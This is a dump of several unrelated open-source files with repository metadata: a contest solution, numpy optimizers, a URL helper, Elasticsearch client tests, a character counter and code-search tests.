2020-12-15T21:54:41.000Z
|
atcoder/abc059/b.py
|
Ashindustry007/competitive-programming
|
2eabd3975c029d235abb7854569593d334acae2f
|
[
"WTFPL"
] | 234
|
2018-08-06T17:11:41.000Z
|
2022-03-26T10:56:42.000Z
|
#!/usr/bin/env python3
# https://abc059.contest.atcoder.jp/tasks/abc059_b
a = int(input())
b = int(input())
if a == b: print('EQUAL')
elif a < b: print('LESS')
else: print('GREATER')
| 22.875
| 50
| 0.650273
|
fe4c5bf32ba08eb64a90f40b14f3cc571817c9d6
| 3,755
|
py
|
Python
|
chapter08/commons/optimizer.py
|
Myeonghan-Jeong/deep-learning-from-scratch
|
0df7f9f352920545f5309e8e11c7cf879ad477e5
|
[
"MIT"
] | null | null | null |
chapter08/commons/optimizer.py
|
Myeonghan-Jeong/deep-learning-from-scratch
|
0df7f9f352920545f5309e8e11c7cf879ad477e5
|
[
"MIT"
] | 3
|
2021-06-08T21:22:11.000Z
|
2021-09-08T01:55:11.000Z
|
chapter08/commons/optimizer.py
|
myeonghan-nim/deep-learning-from-scratch
|
fef3e327c49593b5df74728a1cba1144948a2999
|
[
"MIT"
] | null | null | null |
import numpy as np
class SGD:
def __init__(self, lr=0.01):
self.lr = lr
def update(self, params, grads):
for key in params.keys():
params[key] -= self.lr * grads[key]
class Momentum:
def __init__(self, lr=0.01, momentum=0.9):
self.lr = lr
self.momentum = momentum
self.v = None
def update(self, params, grads):
if self.v is None:
self.v = {}
for key, val in params.items():
self.v[key] = np.zeros_like(val)
for key in params.keys():
self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
params[key] += self.v[key]
class Nesterov:
# upgraded momentum, Nesterov's Accelerated Gradient: http://arxiv.org/abs/1212.0901, http://newsight.tistory.com/224
def __init__(self, lr=0.01, momentum=0.9):
self.lr = lr
self.momentum = momentum
self.v = None
def update(self, params, grads):
if self.v is None:
self.v = {}
for key, val in params.items():
self.v[key] = np.zeros_like(val)
for key in params.keys():
self.v[key] *= self.momentum
self.v[key] -= self.lr * grads[key]
params[key] += self.momentum * self.momentum * self.v[key]
params[key] -= (1 + self.momentum) * self.lr * grads[key]
class AdaGrad:
def __init__(self, lr=0.01):
self.lr = lr
self.h = None
def update(self, params, grads):
if self.h is None:
self.h = {}
for key, val in params.items():
self.h[key] = np.zeros_like(val)
for key in params.keys():
self.h[key] += grads[key] * grads[key]
params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)
class RMSprop:
def __init__(self, lr=0.01, decay_rate=0.99):
self.lr = lr
self.decay_rate = decay_rate
self.h = None
def update(self, params, grads):
if self.h is None:
self.h = {}
for key, val in params.items():
self.h[key] = np.zeros_like(val)
for key in params.keys():
self.h[key] *= self.decay_rate
self.h[key] += (1 - self.decay_rate) * grads[key] * grads[key]
params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)
class Adam: # Adam: http://arxiv.org/abs/1412.6980v8
def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
self.lr = lr
self.beta1 = beta1
self.beta2 = beta2
self.iter = 0
self.m = None
self.v = None
def update(self, params, grads):
if self.m is None:
self.m, self.v = {}, {}
for key, val in params.items():
self.m[key] = np.zeros_like(val)
self.v[key] = np.zeros_like(val)
self.iter += 1
lr_t = self.lr * np.sqrt(1.0 - self.beta2 ** self.iter) / \
(1.0 - self.beta1 ** self.iter)
for key in params.keys():
# self.m[key] = self.beta1 * self.m[key] + (1 - self.beta1) * grads[key]
# self.v[key] = self.beta2 * self.v[key] + (1 - self.beta2) * (grads[key] ** 2)
self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
self.v[key] += (1 - self.beta2) * (grads[key] ** 2 - self.v[key])
params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)
# unbias_m += (1 - self.beta1) * (grads[key] - self.m[key]) # correct bias
# unbisa_b += (1 - self.beta2) * (grads[key]*grads[key] - self.v[key]) # correct bias
# params[key] += self.lr * unbias_m / (np.sqrt(unbisa_b) + 1e-7)
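# All of the update rules above share the same params/grads dict convention, so the
# classes are drop-in replacements for one another. A minimal sketch on a toy
# quadratic (the numbers below are arbitrary illustration):
if __name__ == '__main__':
    # minimize f(w) = 0.5 * ||w||^2, whose gradient is simply w
    params = {'w': np.array([3.0, -2.0])}
    optimizer = SGD(lr=0.1)  # Momentum, AdaGrad, RMSprop or Adam can be swapped in unchanged
    for _ in range(200):
        grads = {'w': params['w'].copy()}
        optimizer.update(params, grads)
    print(params['w'])  # very close to [0. 0.]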
| 32.37069
| 121
| 0.514514
|
c5ae2e7c2f58bb828c4f607981d72ceef3ac1833
| 852
|
py
|
Python
|
src/bots/requests_backend/utils.py
|
lbougan/whale-alert-telegram-bot
|
9216512e4fb3e2ad578ca607b9a581f9a62c0c17
|
[
"MIT"
] | 1
|
2021-12-10T11:27:37.000Z
|
2021-12-10T11:27:37.000Z
|
src/bots/requests_backend/utils.py
|
lbougan/whale-alert-telegram-bot
|
9216512e4fb3e2ad578ca607b9a581f9a62c0c17
|
[
"MIT"
] | null | null | null |
src/bots/requests_backend/utils.py
|
lbougan/whale-alert-telegram-bot
|
9216512e4fb3e2ad578ca607b9a581f9a62c0c17
|
[
"MIT"
] | 1
|
2022-01-16T09:33:39.000Z
|
2022-01-16T09:33:39.000Z
|
from typing import Dict, Union
from six.moves.urllib import parse as urlparse
def build_url(base_url: str, query_params: Dict[str, Union[str, int]]) -> str:
"""
Adds additional query parameters to the base_url
e.g. build_url('https://example.ch', {'q': 'demo'}) -> https://example.ch?q=demo.
It will also consider existing GET arguments.
:param base_url: url string
:param query_params: dict with additional arguments to be appended to the base_url
:return: url string
"""
assert isinstance(query_params, dict), "Dictionary is expected in `query_params` {}".format(
query_params
)
url_parts = list(urlparse.urlparse(base_url))
query = dict(urlparse.parse_qsl(url_parts[4]))
query.update(query_params)
url_parts[4] = urlparse.urlencode(query)
return urlparse.urlunparse(url_parts)
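# A quick sanity check of the merge behaviour described in the docstring above
# (the URL and parameters are purely illustrative):
if __name__ == '__main__':
    merged = build_url('https://example.ch/search?page=2', {'q': 'demo', 'limit': 10})
    print(merged)  # e.g. https://example.ch/search?page=2&q=demo&limit=10 (ordering may vary)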
| 35.5
| 96
| 0.704225
|
b81d9bc767d2caac86adacc782af9a32d502f9da
| 19,618
|
py
|
Python
|
cloudkitty/tests/storage/v2/elasticsearch/test_client.py
|
stackhpc/cloudkitty
|
25149441fb9bf1a5d0b5dd6db81468ca14c2998a
|
[
"Apache-2.0"
] | null | null | null |
cloudkitty/tests/storage/v2/elasticsearch/test_client.py
|
stackhpc/cloudkitty
|
25149441fb9bf1a5d0b5dd6db81468ca14c2998a
|
[
"Apache-2.0"
] | 1
|
2022-01-20T16:35:22.000Z
|
2022-01-20T16:35:22.000Z
|
cloudkitty/tests/storage/v2/elasticsearch/test_client.py
|
stackhpc/cloudkitty
|
25149441fb9bf1a5d0b5dd6db81468ca14c2998a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import collections
import datetime
import unittest
from dateutil import tz
import mock
from cloudkitty import dataframe
from cloudkitty.storage.v2.elasticsearch import client
from cloudkitty.storage.v2.elasticsearch import exceptions
class TestElasticsearchClient(unittest.TestCase):
def setUp(self):
super(TestElasticsearchClient, self).setUp()
self.client = client.ElasticsearchClient(
'http://elasticsearch:9200',
'index_name',
'test_mapping',
autocommit=False)
def test_build_must_no_params(self):
self.assertEqual(self.client._build_must(None, None, None, None), [])
def test_build_must_with_start_end(self):
start = datetime.datetime(2019, 8, 30, tzinfo=tz.UTC)
end = datetime.datetime(2019, 8, 31, tzinfo=tz.UTC)
self.assertEqual(
self.client._build_must(start, end, None, None),
[{'range': {'start': {'gte': '2019-08-30T00:00:00+00:00'}}},
{'range': {'end': {'lte': '2019-08-31T00:00:00+00:00'}}}],
)
def test_build_must_with_filters(self):
filters = {'one': '1', 'two': '2', 'type': 'awesome'}
self.assertEqual(
self.client._build_must(None, None, None, filters),
[{'term': {'type': 'awesome'}}],
)
def test_build_must_with_metric_types(self):
types = ['awesome', 'amazing']
self.assertEqual(
self.client._build_must(None, None, types, None),
[{'terms': {'type': ['awesome', 'amazing']}}],
)
def test_build_should_no_filters(self):
self.assertEqual(
self.client._build_should(None),
[],
)
def test_build_should_with_filters(self):
filters = collections.OrderedDict([
('one', '1'), ('two', '2'), ('type', 'awesome')])
self.assertEqual(
self.client._build_should(filters),
[
{'term': {'groupby.one': '1'}},
{'term': {'metadata.one': '1'}},
{'term': {'groupby.two': '2'}},
{'term': {'metadata.two': '2'}},
],
)
def test_build_composite_no_groupby(self):
self.assertEqual(self.client._build_composite(None), [])
def test_build_composite(self):
self.assertEqual(
self.client._build_composite(['one', 'type', 'two']),
{'sources': [
{'one': {'terms': {'field': 'groupby.one'}}},
{'type': {'terms': {'field': 'type'}}},
{'two': {'terms': {'field': 'groupby.two'}}},
]},
)
def test_build_query_no_args(self):
self.assertEqual(self.client._build_query(None, None, None), {})
def test_build_query(self):
must = [{'range': {'start': {'gte': '2019-08-30T00:00:00+00:00'}}},
{'range': {'start': {'lt': '2019-08-31T00:00:00+00:00'}}}]
should = [
{'term': {'groupby.one': '1'}},
{'term': {'metadata.one': '1'}},
{'term': {'groupby.two': '2'}},
{'term': {'metadata.two': '2'}},
]
composite = {'sources': [
{'one': {'terms': {'field': 'groupby.one'}}},
{'type': {'terms': {'field': 'type'}}},
{'two': {'terms': {'field': 'groupby.two'}}},
]}
expected = {
'query': {
'bool': {
'must': must,
'should': should,
'minimum_should_match': 2,
},
},
'aggs': {
'sum_and_price': {
'composite': composite,
'aggregations': {
"sum_price": {"sum": {"field": "price"}},
"sum_qty": {"sum": {"field": "qty"}},
},
},
},
}
self.assertEqual(
self.client._build_query(must, should, composite), expected)
def test_log_query_no_hits(self):
url = '/endpoint'
body = {'1': 'one'}
response = {'took': 42}
expected = """Query on /endpoint with body "{'1': 'one'}" took 42ms"""
with mock.patch.object(client.LOG, 'debug') as debug_mock:
self.client._log_query(url, body, response)
debug_mock.assert_called_once_with(expected)
def test_log_query_with_hits(self):
url = '/endpoint'
body = {'1': 'one'}
response = {'took': 42, 'hits': {'total': 1337}}
expected = """Query on /endpoint with body "{'1': 'one'}" took 42ms"""
expected += " for 1337 hits"
with mock.patch.object(client.LOG, 'debug') as debug_mock:
self.client._log_query(url, body, response)
debug_mock.assert_called_once_with(expected)
def test_req_valid_status_code_no_deserialize(self):
resp_mock = mock.MagicMock()
resp_mock.status_code = 200
method_mock = mock.MagicMock()
method_mock.return_value = resp_mock
req_resp = self.client._req(
method_mock, None, None, None, deserialize=False)
method_mock.assert_called_once_with(None, data=None, params=None)
self.assertEqual(req_resp, resp_mock)
def test_req_valid_status_code_deserialize(self):
resp_mock = mock.MagicMock()
resp_mock.status_code = 200
resp_mock.json.return_value = 'output'
method_mock = mock.MagicMock()
method_mock.return_value = resp_mock
with mock.patch.object(self.client, '_log_query') as log_mock:
req_resp = self.client._req(
method_mock, None, None, None, deserialize=True)
method_mock.assert_called_once_with(None, data=None, params=None)
self.assertEqual(req_resp, 'output')
log_mock.assert_called_once_with(None, None, 'output')
def test_req_invalid_status_code(self):
resp_mock = mock.MagicMock()
resp_mock.status_code = 400
method_mock = mock.MagicMock()
method_mock.return_value = resp_mock
self.assertRaises(exceptions.InvalidStatusCode,
self.client._req,
method_mock, None, None, None)
def test_put_mapping(self):
mapping = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.put_mapping(mapping)
rmock.assert_called_once_with(
self.client._sess.put,
'http://elasticsearch:9200/index_name/_mapping/test_mapping',
'{"a": "b"}', {'include_type_name': 'true'}, deserialize=False)
def test_get_index(self):
with mock.patch.object(self.client, '_req') as rmock:
self.client.get_index()
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/index_name',
None, None, deserialize=False)
def test_search_without_scroll(self):
mapping = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.search(mapping, scroll=False)
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/index_name/_search',
'{"a": "b"}', None)
def test_search_with_scroll(self):
mapping = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.search(mapping, scroll=True)
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/index_name/_search',
'{"a": "b"}', {'scroll': '60s'})
def test_scroll(self):
body = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.scroll(body)
rmock.assert_called_once_with(
self.client._sess.get,
'http://elasticsearch:9200/_search/scroll',
'{"a": "b"}', None)
def test_close_scroll(self):
body = {'a': 'b'}
with mock.patch.object(self.client, '_req') as rmock:
self.client.close_scroll(body)
rmock.assert_called_once_with(
self.client._sess.delete,
'http://elasticsearch:9200/_search/scroll',
'{"a": "b"}', None, deserialize=False)
def test_close_scrolls(self):
with mock.patch.object(self.client, 'close_scroll') as func_mock:
with mock.patch.object(self.client, '_scroll_ids',
new=['a', 'b', 'c']):
self.client.close_scrolls()
func_mock.assert_called_once_with(
{'scroll_id': ['a', 'b', 'c']})
self.assertSetEqual(set(), self.client._scroll_ids)
def test_bulk_with_instruction(self):
instruction = {'instruction': {}}
terms = ('one', 'two', 'three')
expected_data = ''.join([
'{"instruction": {}}\n'
'"one"\n'
'{"instruction": {}}\n'
'"two"\n'
'{"instruction": {}}\n'
'"three"\n',
])
with mock.patch.object(self.client, '_req') as rmock:
self.client.bulk_with_instruction(instruction, terms)
rmock.assert_called_once_with(
self.client._sess.post,
'http://elasticsearch:9200/index_name/test_mapping/_bulk',
expected_data, None, deserialize=False)
def test_bulk_index(self):
terms = ('one', 'two', 'three')
with mock.patch.object(self.client, 'bulk_with_instruction') as fmock:
self.client.bulk_index(terms)
fmock.assert_called_once_with({'index': {}}, terms)
def test_commit(self):
docs = ['one', 'two', 'three', 'four', 'five', 'six', 'seven']
size = 3
with mock.patch.object(self.client, 'bulk_index') as bulk_mock:
with mock.patch.object(self.client, '_docs', new=docs):
with mock.patch.object(self.client, '_chunk_size', new=size):
self.client.commit()
bulk_mock.assert_has_calls([
mock.call(['one', 'two', 'three']),
mock.call(['four', 'five', 'six']),
mock.call(['seven']),
])
def test_add_point_no_autocommit(self):
point = dataframe.DataPoint(
'unit', '0.42', '0.1337', {}, {})
start = datetime.datetime(2019, 1, 1)
end = datetime.datetime(2019, 1, 1, 1)
with mock.patch.object(self.client, 'commit') as func_mock:
with mock.patch.object(self.client, '_autocommit', new=False):
with mock.patch.object(self.client, '_chunk_size', new=3):
self.client._docs = []
for _ in range(5):
self.client.add_point(
point, 'awesome_type', start, end)
func_mock.assert_not_called()
self.assertEqual(self.client._docs, [{
'start': start,
'end': end,
'type': 'awesome_type',
'unit': point.unit,
'qty': point.qty,
'price': point.price,
'groupby': point.groupby,
'metadata': point.metadata,
} for _ in range(5)])
self.client._docs = []
def test_add_point_with_autocommit(self):
point = dataframe.DataPoint(
'unit', '0.42', '0.1337', {}, {})
start = datetime.datetime(2019, 1, 1)
end = datetime.datetime(2019, 1, 1, 1)
commit_calls = {'count': 0}
def commit():
# We can't re-assign nonlocal variables in python2
commit_calls['count'] += 1
self.client._docs = []
with mock.patch.object(self.client, 'commit', new=commit):
with mock.patch.object(self.client, '_autocommit', new=True):
with mock.patch.object(self.client, '_chunk_size', new=3):
self.client._docs = []
for i in range(5):
self.client.add_point(
point, 'awesome_type', start, end)
self.assertEqual(commit_calls['count'], 1)
self.assertEqual(self.client._docs, [{
'start': start,
'end': end,
'type': 'awesome_type',
'unit': point.unit,
'qty': point.qty,
'price': point.price,
'groupby': point.groupby,
'metadata': point.metadata,
} for _ in range(2)])
# cleanup
self.client._docs = []
def test_delete_by_query_with_must(self):
with mock.patch.object(self.client, '_req') as rmock:
with mock.patch.object(self.client, '_build_must') as func_mock:
func_mock.return_value = {'a': 'b'}
self.client.delete_by_query()
rmock.assert_called_once_with(
self.client._sess.post,
'http://elasticsearch:9200/index_name/_delete_by_query',
'{"query": {"bool": {"must": {"a": "b"}}}}', None)
def test_delete_by_query_no_must(self):
with mock.patch.object(self.client, '_req') as rmock:
with mock.patch.object(self.client, '_build_must') as func_mock:
func_mock.return_value = {}
self.client.delete_by_query()
rmock.assert_called_once_with(
self.client._sess.post,
'http://elasticsearch:9200/index_name/_delete_by_query',
None, None)
def test_retrieve_no_pagination(self):
search_resp = {
'_scroll_id': '000',
'hits': {'hits': ['one', 'two', 'three'], 'total': 12},
}
scroll_resps = [{
'_scroll_id': str(i + 1) * 3,
'hits': {'hits': ['one', 'two', 'three']},
} for i in range(3)]
scroll_resps.append({'_scroll_id': '444', 'hits': {'hits': []}})
self.client._scroll_ids = set()
with mock.patch.object(self.client, 'search') as search_mock:
with mock.patch.object(self.client, 'scroll') as scroll_mock:
with mock.patch.object(self.client, 'close_scrolls') as close:
search_mock.return_value = search_resp
scroll_mock.side_effect = scroll_resps
total, resp = self.client.retrieve(
None, None, None, None, paginate=False)
search_mock.assert_called_once()
scroll_mock.assert_has_calls([
mock.call({
'scroll_id': str(i) * 3,
'scroll': '60s',
}) for i in range(4)
])
self.assertEqual(total, 12)
self.assertEqual(resp, ['one', 'two', 'three'] * 4)
self.assertSetEqual(self.client._scroll_ids,
set(str(i) * 3 for i in range(5)))
close.assert_called_once()
self.client._scroll_ids = set()
def test_retrieve_with_pagination(self):
search_resp = {
'_scroll_id': '000',
'hits': {'hits': ['one', 'two', 'three'], 'total': 12},
}
scroll_resps = [{
'_scroll_id': str(i + 1) * 3,
'hits': {'hits': ['one', 'two', 'three']},
} for i in range(3)]
scroll_resps.append({'_scroll_id': '444', 'hits': {'hits': []}})
self.client._scroll_ids = set()
with mock.patch.object(self.client, 'search') as search_mock:
with mock.patch.object(self.client, 'scroll') as scroll_mock:
with mock.patch.object(self.client, 'close_scrolls') as close:
search_mock.return_value = search_resp
scroll_mock.side_effect = scroll_resps
total, resp = self.client.retrieve(
None, None, None, None,
offset=2, limit=4, paginate=True)
search_mock.assert_called_once()
scroll_mock.assert_called_once_with({
'scroll_id': '000',
'scroll': '60s',
})
self.assertEqual(total, 12)
self.assertEqual(resp, ['three', 'one', 'two', 'three'])
self.assertSetEqual(self.client._scroll_ids,
set(str(i) * 3 for i in range(2)))
close.assert_called_once()
self.client._scroll_ids = set()
def _do_test_total(self, groupby, paginate):
with mock.patch.object(self.client, 'search') as search_mock:
if groupby:
search_resps = [{
'aggregations': {
'sum_and_price': {
'buckets': ['one', 'two', 'three'],
'after_key': str(i),
}
}
} for i in range(3)]
last_resp_aggs = search_resps[2]['aggregations']
last_resp_aggs['sum_and_price'].pop('after_key')
last_resp_aggs['sum_and_price']['buckets'] = []
search_mock.side_effect = search_resps
else:
search_mock.return_value = {
'aggregations': ['one', 'two', 'three'],
}
resp = self.client.total(None, None, None, None, groupby,
offset=2, limit=4, paginate=paginate)
if not groupby:
search_mock.assert_called_once()
return resp
def test_total_no_groupby_no_pagination(self):
total, aggs = self._do_test_total(None, False)
self.assertEqual(total, 1)
self.assertEqual(aggs, [['one', 'two', 'three']])
def test_total_no_groupby_with_pagination(self):
total, aggs = self._do_test_total(None, True)
self.assertEqual(total, 1)
self.assertEqual(aggs, [['one', 'two', 'three']])
def test_total_with_groupby_no_pagination(self):
total, aggs = self._do_test_total(['x'], False)
self.assertEqual(total, 6)
self.assertEqual(aggs, ['one', 'two', 'three'] * 2)
def test_total_with_groupby_with_pagination(self):
total, aggs = self._do_test_total(['x'], True)
self.assertEqual(total, 6)
self.assertEqual(aggs, ['three', 'one', 'two', 'three'])
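# Read together, the tests above imply roughly this call sequence for the client under
# test. The sketch reuses this module's imports and the same placeholder endpoint and
# index names as the tests; it would need a reachable Elasticsearch to actually run.
if __name__ == '__main__':
    es = client.ElasticsearchClient(
        'http://elasticsearch:9200', 'index_name', 'test_mapping', autocommit=False)
    point = dataframe.DataPoint('unit', '0.42', '0.1337', {}, {})
    start = datetime.datetime(2019, 1, 1)
    end = datetime.datetime(2019, 1, 1, 1)
    es.add_point(point, 'awesome_type', start, end)  # buffered locally in es._docs
    es.commit()                                      # bulk-indexes everything buffered so far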
| 40.616977
| 79
| 0.524569
|
5be2c43ad0a66fe0abbe48f101d8d1f644e8734c
| 475
|
py
|
Python
|
lectures/07-python-dictionaries/examples/char_count1.py
|
donaldscoon/biosys-analytics
|
8d4593277bd701c77ff5c2d5eb3aee7c67ab33a4
|
[
"MIT"
] | 1
|
2019-01-15T16:30:25.000Z
|
2019-01-15T16:30:25.000Z
|
lectures/07-python-dictionaries/examples/char_count1.py
|
donaldscoon/biosys-analytics
|
8d4593277bd701c77ff5c2d5eb3aee7c67ab33a4
|
[
"MIT"
] | null | null | null |
lectures/07-python-dictionaries/examples/char_count1.py
|
donaldscoon/biosys-analytics
|
8d4593277bd701c77ff5c2d5eb3aee7c67ab33a4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Character counter"""
import sys
import os
from collections import Counter
args = sys.argv[1:]
if len(args) != 1:
print('Usage: {} INPUT'.format(os.path.basename(sys.argv[0])))
sys.exit(1)
arg = args[0]
text = ''
if os.path.isfile(arg):
text = ''.join(open(arg).read().splitlines())
else:
text = arg
count = Counter(text.lower())
for letter, num in count.items():
print('{} {:5}'.format(letter, num))
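# Example run (hypothetical input file):
#   $ python3 char_count1.py poem.txt
#   e    42
#   t    31
# A non-file argument is counted literally, e.g. `python3 char_count1.py hello`.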
| 18.269231
| 63
| 0.595789
|
960bed93b5f86286d58e0591b45527a8bf17acd6
| 18,159
|
py
|
Python
|
tests/test_search.py
|
mubashshirjamal/code
|
d9c7adf7efed8e9c1ab3ff8cdeb94e7eb1a45382
|
[
"BSD-3-Clause"
] | 1,582
|
2015-01-05T02:41:44.000Z
|
2022-03-30T20:03:22.000Z
|
tests/test_search.py
|
mubashshirjamal/code
|
d9c7adf7efed8e9c1ab3ff8cdeb94e7eb1a45382
|
[
"BSD-3-Clause"
] | 66
|
2015-01-23T07:58:04.000Z
|
2021-11-12T02:23:27.000Z
|
tests/test_search.py
|
mubashshirjamal/code
|
d9c7adf7efed8e9c1ab3ff8cdeb94e7eb1a45382
|
[
"BSD-3-Clause"
] | 347
|
2015-01-05T07:47:07.000Z
|
2021-09-20T21:22:32.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import shutil
import vilya.models.elastic as _el
from nose import SkipTest
from tests.base import TestCase
from tests.utils import delete_project
from vilya.libs.search import code_unittest_client
import vilya.models.elastic.indexer as _index
import vilya.models.elastic.searcher as _search
import vilya.models.elastic.issue_pr_search as _isprsearch
import vilya.models.elastic.src_search as _srcsearch
import vilya.models.elastic.user_search as _usersearch
import vilya.models.elastic.repo_search as _reposearch
from vilya.models.elastic.issue_pr_search import (
IssuePRSearch, IssueSearch, PullRequestSearch)
from vilya.models.elastic.searcher import SearchEngine
from vilya.models.project_issue import ProjectIssue
from vilya.models.ticket import Ticket
from vilya.models.project import CodeDoubanProject
from vilya.models.sphinx_docs import SphinxDocs
from vilya.models.gist import Gist
from vilya.models.git import make_git_env
from vilya.models.user import User
from vilya.models.pull import PullRequest, add_pull
from vilya.libs.permdir import get_tmpdir
base_yaml_conf = """
sphinx_docs:
dir: ""
"""
base_index_rst = """
Unit testing sphinx docs
========================
.. toctree::
:glob:
*
"""
base_document1_rst = """
Test doc1
=========
Something here
"""
base_document2_rst = """
Test doc2
=========
Something here
"""
src_source1_py = """
from elastic import src_search
def test():
return 'hello'
"""
src_source2_c = """
#include <stdio.h>
int main()
{
printf(\"%d\n\", 3);
return 0;
}
"""
SKIP_TEST = True
def skip_test(*args, **kwargs):
if SKIP_TEST:
raise SkipTest(*args, **kwargs)
_index.IndexEngine.c = code_unittest_client
_search.SearchEngine.c = code_unittest_client
_el.CodeSearch.c = code_unittest_client
_el.SearchEngine.c = code_unittest_client
_isprsearch.SearchEngine.c = code_unittest_client
_isprsearch.IndexEngine.c = code_unittest_client
_srcsearch.SearchEngine.c = code_unittest_client
_srcsearch.IndexEngine.c = code_unittest_client
_reposearch.SearchEngine.c = code_unittest_client
_reposearch.IndexEngine.c = code_unittest_client
_usersearch.SearchEngine.c = code_unittest_client
_usersearch.IndexEngine.c = code_unittest_client
class TestProject(TestCase):
def setUp(self):
super(TestProject, self).setUp()
_el.CodeSearch.c.delete()
def _prj(self):
delete_project('test')
prj = CodeDoubanProject.add('test', 'owner', create_trac=False)
return prj
def _add(self, prj, fn, content):
u = self.addUser()
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_empty_project(self):
p = self._prj()
_el.CodeSearch.index_a_project_docs(p.id)
ds = _el.DocsSearch(p.id)
ret = ds._doc_file_as_dict('path', 'name', 'doc_dir')
assert not ret
def test_create_with_index_and_doc(self):
prj = self._prj()
# self._add(prj, 'code_config.yaml', base_yaml_conf)
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
sd = SphinxDocs(prj.name)
sd.build_all()
_el.CodeSearch.index_a_project_docs(prj.id)
ds = _el.DocsSearch(prj.id)
ret = ds._doc_file_as_dict('docs/doc1.rst', 'docs', 'docs')
assert ret['doc_name'] == 'docs'
assert ret['url'] == 'docs/rstdocs/doc1/'
assert ret['content'] == base_document1_rst
assert ret['type'] == 'docs'
assert ret['doc_dir'] == 'docs'
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_doc_file_datas(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
ds = _el.DocsSearch(prj.id)
big_search_data = ds.doc_file_datas()
assert len(big_search_data) == 2
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_index_a_project_docs(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('Something', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_index_a_project_docs_search_no_result(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase(
'SomethingXXXXXX', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_html_index_a_project_docs(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.html', "<h1>Test html page</h1>")
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('Something', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_cleared_page_not_indexd(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', "aaa")
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
self._add(prj, 'docs/index.rst', "")
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_removed_page_not_indexd(self):
raise SkipTest("advanced index way doesn't exist now.")
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', 'aaa')
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
prj.git.call('read-tree HEAD')
temp_dir = get_tmpdir()
env = make_git_env(is_anonymous=True)
prj.git.call('--work-tree %s checkout-index --force -a' % temp_dir)
prj.git.call(['--work-tree', temp_dir, 'rm', 'docs/doc1.rst'])
prj.git.call(['--work-tree', temp_dir, 'commit', '-m', 'm'], _env=env)
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0, \
"Should find no results after removing and reindexing"
_el.CodeSearch.delete_a_project_docs(prj.id)
shutil.rmtree(temp_dir)
class TestGist(TestCase):
def setUp(self):
super(TestGist, self).setUp()
_el.CodeSearch.c.delete()
def _gist(self):
gist = Gist.add('description', 'testuser', is_public=True)
return gist
def test_empty_repo(self):
skip_test()
gist = self._gist()
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('testuser', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
_el.CodeSearch.delete_a_gist(gist.id)
def test_search_repo_file(self):
skip_test()
gist = self._gist()
gist.update(description='description',
gist_names=['file1', 'file2'],
gist_contents=['document', 'document'])
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('file2', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
res = _el.CodeSearch.search_a_phrase('document', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
